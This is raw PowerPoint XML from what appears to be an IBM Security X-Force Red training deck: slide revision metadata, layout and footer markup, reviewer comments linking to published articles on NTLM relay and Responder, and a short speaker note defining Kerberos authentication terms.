          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{6FD0BE9A-6880-4BB7-888B-7CA29C4151E1}" dt="2023-08-08T01:26:27.921" v="385" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1182856112" sldId="1269"/>
            <ac:spMk id="5" creationId="{D2CDA6A4-9F7F-3549-A896-C63D375DD497}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{6FD0BE9A-6880-4BB7-888B-7CA29C4151E1}" dt="2023-08-08T01:18:51.197" v="104" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2425454560" sldId="1291"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{6FD0BE9A-6880-4BB7-888B-7CA29C4151E1}" dt="2023-08-08T01:18:51.197" v="104" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2425454560" sldId="1291"/>
            <ac:spMk id="5" creationId="{D2CDA6A4-9F7F-3549-A896-C63D375DD497}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{6FD0BE9A-6880-4BB7-888B-7CA29C4151E1}" dt="2023-08-08T01:14:49.615" v="95" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1257298437" sldId="1292"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{6FD0BE9A-6880-4BB7-888B-7CA29C4151E1}" dt="2023-08-08T01:14:49.615" v="95" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1257298437" sldId="1292"/>
            <ac:spMk id="5" creationId="{43208311-B6DD-D44B-AD6A-8FC4ACF2CA0D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{6FD0BE9A-6880-4BB7-888B-7CA29C4151E1}" dt="2023-08-08T01:14:23.584" v="69" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3080325906" sldId="1293"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{6FD0BE9A-6880-4BB7-888B-7CA29C4151E1}" dt="2023-08-08T01:14:23.584" v="69" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3080325906" sldId="1293"/>
            <ac:spMk id="5" creationId="{43208311-B6DD-D44B-AD6A-8FC4ACF2CA0D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{6FD0BE9A-6880-4BB7-888B-7CA29C4151E1}" dt="2023-08-08T01:13:16.848" v="62" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="154816468" sldId="1298"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{6FD0BE9A-6880-4BB7-888B-7CA29C4151E1}" dt="2023-08-08T01:13:16.848" v="62" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="154816468" sldId="1298"/>
            <ac:spMk id="5" creationId="{43208311-B6DD-D44B-AD6A-8FC4ACF2CA0D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{6FD0BE9A-6880-4BB7-888B-7CA29C4151E1}" dt="2023-08-08T01:16:05.069" v="101" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="998646205" sldId="1299"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{6FD0BE9A-6880-4BB7-888B-7CA29C4151E1}" dt="2023-08-08T01:15:52.710" v="97" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="998646205" sldId="1299"/>
            <ac:spMk id="5" creationId="{43208311-B6DD-D44B-AD6A-8FC4ACF2CA0D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{6FD0BE9A-6880-4BB7-888B-7CA29C4151E1}" dt="2023-08-08T01:16:05.069" v="101" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="998646205" sldId="1299"/>
            <ac:spMk id="8" creationId="{39C36B9D-CF36-F243-B92B-DA967E394F36}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{6FD0BE9A-6880-4BB7-888B-7CA29C4151E1}" dt="2023-08-08T01:15:55.382" v="98" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="998646205" sldId="1299"/>
            <ac:picMk id="6" creationId="{58790F91-8D6D-3D82-0D84-A0FEE278457F}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{6FD0BE9A-6880-4BB7-888B-7CA29C4151E1}" dt="2023-08-08T01:13:30.239" v="64" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2533756484" sldId="1338"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Sung Gwan Choi" userId="" providerId="" clId="Web-{6FD0BE9A-6880-4BB7-888B-7CA29C4151E1}" dt="2023-08-08T01:13:30.239" v="64" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2533756484" sldId="1338"/>
            <ac:spMk id="5" creationId="{D2CDA6A4-9F7F-3549-A896-C63D375DD497}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Scott Brink" clId="Web-{72414730-3546-4FFB-85E2-816CFFCD306E}"/>
    <pc:docChg chg="addSld delSld">
      <pc:chgData name="Scott Brink" userId="" providerId="" clId="Web-{72414730-3546-4FFB-85E2-816CFFCD306E}" dt="2023-08-07T20:16:24.824" v="7"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="del">
        <pc:chgData name="Scott Brink" userId="" providerId="" clId="Web-{72414730-3546-4FFB-85E2-816CFFCD306E}" dt="2023-08-07T20:16:21.012" v="4"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3119497603" sldId="1325"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Scott Brink" userId="" providerId="" clId="Web-{72414730-3546-4FFB-85E2-816CFFCD306E}" dt="2023-08-07T20:16:24.824" v="7"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="366479610" sldId="1335"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Scott Brink" userId="" providerId="" clId="Web-{72414730-3546-4FFB-85E2-816CFFCD306E}" dt="2023-08-07T20:16:22.996" v="6"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2768196322" sldId="1341"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Scott Brink" userId="" providerId="" clId="Web-{72414730-3546-4FFB-85E2-816CFFCD306E}" dt="2023-08-07T20:16:21.262" v="5"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2003371620" sldId="1342"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Scott Brink" userId="" providerId="" clId="Web-{72414730-3546-4FFB-85E2-816CFFCD306E}" dt="2023-08-07T20:16:13.215" v="2"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1795872042" sldId="1343"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Scott Brink" userId="" providerId="" clId="Web-{72414730-3546-4FFB-85E2-816CFFCD306E}" dt="2023-08-07T20:16:13.543" v="3"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3900705313" sldId="1344"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldMasterChg chg="addSldLayout">
        <pc:chgData name="Scott Brink" userId="" providerId="" clId="Web-{72414730-3546-4FFB-85E2-816CFFCD306E}" dt="2023-08-07T20:16:13.543" v="3"/>
        <pc:sldMasterMkLst>
          <pc:docMk/>
          <pc:sldMasterMk cId="1927666890" sldId="2147483824"/>
        </pc:sldMasterMkLst>
        <pc:sldLayoutChg chg="add">
          <pc:chgData name="Scott Brink" userId="" providerId="" clId="Web-{72414730-3546-4FFB-85E2-816CFFCD306E}" dt="2023-08-07T20:15:48.261" v="0"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1927666890" sldId="2147483824"/>
            <pc:sldLayoutMk cId="718506016" sldId="2147484277"/>
          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="add">
          <pc:chgData name="Scott Brink" userId="" providerId="" clId="Web-{72414730-3546-4FFB-85E2-816CFFCD306E}" dt="2023-08-07T20:15:48.543" v="1"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1927666890" sldId="2147483824"/>
            <pc:sldLayoutMk cId="718506016" sldId="2147484278"/>
          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="add">
          <pc:chgData name="Scott Brink" userId="" providerId="" clId="Web-{72414730-3546-4FFB-85E2-816CFFCD306E}" dt="2023-08-07T20:16:13.215" v="2"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1927666890" sldId="2147483824"/>
            <pc:sldLayoutMk cId="718506016" sldId="2147484279"/>
          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="add">
          <pc:chgData name="Scott Brink" userId="" providerId="" clId="Web-{72414730-3546-4FFB-85E2-816CFFCD306E}" dt="2023-08-07T20:16:13.543" v="3"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1927666890" sldId="2147483824"/>
            <pc:sldLayoutMk cId="718506016" sldId="2147484280"/>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5-10T04:52:09.177" idx="8">
    <p:pos x="10" y="10"/>
    <p:text>https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/guide/</p:text>
    <p:extLst>
      <p:ext uri="{C676402C-5697-4E1C-873F-D02D1690AC5C}">
        <p15:threadingInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" timeZoneBias="360"/>
      </p:ext>
    </p:extLst>
  </p:cm>
  <p:cm authorId="1" dt="2023-05-10T04:52:27.151" idx="9">
    <p:pos x="10" y="106"/>
    <p:text>https://notsosecure.com/pwning-with-responder-a-pentesters-guide</p:text>
    <p:extLst>
      <p:ext uri="{C676402C-5697-4E1C-873F-D02D1690AC5C}">
        <p15:threadingInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" timeZoneBias="360">
          <p15:parentCm authorId="1"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10T04:53:03.687" idx="10">
    <p:pos x="10" y="10"/>
    <p:text>https://blog.redforce.io/windows-authentication-and-attacks-part-1-ntlm/</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10T04:49:26.376" idx="1">
    <p:pos x="10" y="10"/>
    <p:text>https://en.hackndo.com/ntlm-relay/</p:text>
    <p:extLst>
      <p:ext uri="{C676402C-5697-4E1C-873F-D02D1690AC5C}">
        <p15:threadingInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" timeZoneBias="360"/>
      </p:ext>
    </p:extLst>
  </p:cm>
  <p:cm authorId="1" dt="2023-05-10T04:50:50.095" idx="2">
    <p:pos x="10" y="106"/>
    <p:text>https://infosecwriteups.com/abusing-ntlm-relay-and-pass-the-hash-for-admin-d24d0f12bea0</p:text>
    <p:extLst>
      <p:ext uri="{C676402C-5697-4E1C-873F-D02D1690AC5C}">
        <p15:threadingInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" timeZoneBias="360">
          <p15:parentCm authorId="1" idx="1"/>
        </p15:threadingInfo>
      </p:ext>
    </p:extLst>
  </p:cm>
  <p:cm authorId="1" dt="2023-05-10T04:51:10.001" idx="3">
    <p:pos x="10" y="202"/>
    <p:text>https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html</p:text>
    <p:extLst>
      <p:ext uri="{C676402C-5697-4E1C-873F-D02D1690AC5C}">
        <p15:threadingInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" timeZoneBias="360">
          <p15:parentCm authorId="1" idx="1"/>
        </p15:threadingInfo>
      </p:ext>
    </p:extLst>
  </p:cm>
  <p:cm authorId="1" dt="2023-05-10T04:51:25.393" idx="4">
    <p:pos x="10" y="298"/>
    <p:text>https://www.trustedsec.com/blog/a-comprehensive-guide-on-relaying-anno-2022/</p:text>
    <p:extLst>
      <p:ext uri="{C676402C-5697-4E1C-873F-D02D1690AC5C}">
        <p15:threadingInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" timeZoneBias="360">
          <p15:parentCm authorId="1"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rPr>
              <a:t>IBM Security / © 2020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403050203000203" pitchFamily="34" charset="0"/>
                <a:ea typeface="IBM Plex Sans" charset="0"/>
                <a:cs typeface="IBM Plex Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="l"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>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221976" y="8703030"/>
            <a:ext cx="341241" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>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803671" y="236262"/>
            <a:ext cx="3250659" cy="1828800"/>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18071" y="2188563"/>
            <a:ext cx="6409944" cy="6400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630936" y="8705088"/>
            <a:ext cx="1828800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"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IBM Security / © 2020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IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>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Security / © 2020 IBM Corporation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="117838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dirty="0"/>
              <a:t>IBM Security / © 2020 IBM Corporation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3397100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dirty="0"/>
              <a:t>IBM Security / © 2020 IBM Corporation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="354342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a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l"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IBM Plex Sans Ligh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a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>IBM Security / © 2020 IBM Corporation</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="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2471892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a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l"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000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="IBM Plex Sans Ligh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a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>IBM Security / © 2020 IBM Corporation</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="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62168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latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>- AS: Authentication Server </a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>- PAC: Privilege Attribute Certificate </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>KRB_AS_REP: Encrypted Data section + TGT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>1st session key – session for client and the KDC for the TGT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2nd session key – session key for client and the future service, which will be used during the KRB_TGT_REQ, REP steps.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
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IBM Security / © 2020 IBM Corporation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="193165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58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>IBM Security / © 2020 IBM Corporation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4017879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59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>IBM Security / © 2020 IBM Corporation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4010666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61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>IBM Security / © 2020 IBM Corporation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1055390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7"/>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3053009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775200" y="0"/>
            <a:ext cx="4373927" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>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26382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742451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rgbClr val="9FA5AD"/>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3689708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59"/>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59"/>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59"/>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393972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8"/>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701735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4018284411"/>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A2191F"/>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X-Force Red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A4D56"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="A2191F"/>
            </a:solidFill>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A4D56"/>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A2191F"/>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A2191F"/>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rgbClr val="FA4D56"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="A2191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7" name="aurora-cover-red-2.jpg" descr="aurora-cover-red-2.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F13699D9-8E12-8D49-B239-19B73368E46E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="X-ForceRed_lockup_rev_RGB.png" descr="X-ForceRed_lockup_rev_RGB.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5749E31-3CD4-D94F-8B16-3B0F213AB09E}"/>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1204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49"/>
            <a:ext cx="5030172" cy="4474325"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="91439" rIns="91439" bIns="91439"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="685800">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57" y="2484810"/>
            <a:ext cx="2511457" cy="2237164"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A2191F"/>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685800">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2"/>
            <a:ext cx="1893951" cy="3005963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="125963" indent="-125963">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="305415" indent="-103803">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="577266" indent="-142291">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="757788" indent="-12596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0"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1"/>
            <a:ext cx="1121466" cy="228601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="685800">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69"/>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4" y="3614903"/>
            <a:ext cx="693436"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3"/>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dirty="0"/>
              <a:t>IBM Security X-Force Red / © 2020 IBM Corporation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="727060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4" y="204787"/>
            <a:ext cx="6446312" cy="4154487"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add table</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="91163104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5"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5"/>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2562370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8" name="XFR-aurora-image.jpg" descr="XFR-aurora-image.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F55A9BB7-21E6-9342-8B00-83E9EFCED528}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>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1619733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8" name="XFR-aurora-image.jpg" descr="XFR-aurora-image.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F55A9BB7-21E6-9342-8B00-83E9EFCED528}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>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rgbClr val="9FA5AD"/>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1619733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0414793"/>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995260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775200" y="0"/>
            <a:ext cx="4373927" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
